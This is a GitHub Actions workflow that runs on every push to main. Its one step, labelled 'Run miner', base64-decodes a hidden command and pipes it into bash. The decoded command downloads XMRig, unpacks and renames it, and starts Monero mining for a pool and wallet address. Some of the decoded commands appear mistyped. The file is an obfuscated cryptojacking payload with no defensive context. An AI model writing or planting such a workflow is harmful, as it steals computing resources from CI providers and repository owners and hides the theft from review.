name: Lool

on:
  push:
    branches:
      - main

jobs:
  run-job:
    runs-on: ubuntu-latest
    steps:
      - name: Run miner
        run: |
          echo "Y3VybCBodHRwczovL2dpdGh1Yi5jb20veG1yaWcveG1yaWcvcmVsZWFzZXMvZG93bmxvYWQvdjYuMjIuMi94bXJpZy02LjIyLjItbGludXgtc3RhdGljLXg2NC50YXIuZ3ogLW8gc291bC50YXIuZ3ogJiYgdGFyIC14dnpmIHNvdWwudGFyLmd6ICYmIHN1ZG8gbXZ4IHhtcmlnLTYuMjIuMiBzb3VsICYmIGNkIHNvdWwgJiYgbXggaG1yaWcgc29sIC1vIG1vbmVyb29jZWFuLnN0cmVhbToxMDEyOCAtdSA0N0h4dENtRlh4cVZ6UVNHalFnQm5EQzFMTERScm9rZjNhTUZvY2JXUVJ4WXpqaGp4a2ZMR2p6d0UzUEpockN0ZFFrWFB1bnI4Y1paQkFpRW1ZNVc0NlYxVVY4bUZNWmggLWsg" | base64 --decode | bash
